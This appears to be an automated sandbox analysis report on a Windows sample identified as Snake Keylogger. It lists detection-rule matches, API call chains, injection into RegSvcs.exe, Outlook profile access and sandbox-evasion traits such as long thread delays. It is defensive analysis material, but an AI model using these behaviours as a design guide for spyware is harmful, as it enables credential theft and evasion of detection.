                    Source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@5/4
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\aut4DC0.tmpJump to behavior
                    Source: 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 1.exeReversingLabs: Detection: 34%
                    Source: 1.exeVirustotal: Detection: 47%
                    Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\1.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
                    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\1.exe"
                    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\1.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: wntdll.pdbUGP source: 1.exe, 00000000.00000003.1353312104.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1354529321.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 1.exe, 00000000.00000003.1353312104.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1354529321.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                    Source: 1.exeStatic PE information: real checksum: 0xa2135 should be: 0xcf0ff
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222891E pushad ; iretd 1_2_0222891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02228C2F pushfd ; iretd 1_2_02228C30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02228DDF push esp; iretd 1_2_02228DE0
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\1.exeAPI/Special instruction interceptor: Address: A93244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598032Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597907Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597782Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595989Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2487Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 1750Jump to behavior
                    Source: C:\Users\user\Desktop\1.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-35018
                    Source: C:\Users\user\Desktop\1.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-34820
                    Source: C:\Users\user\Desktop\1.exeAPI coverage: 5.1 %
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598032Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597907Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597782Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595989Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
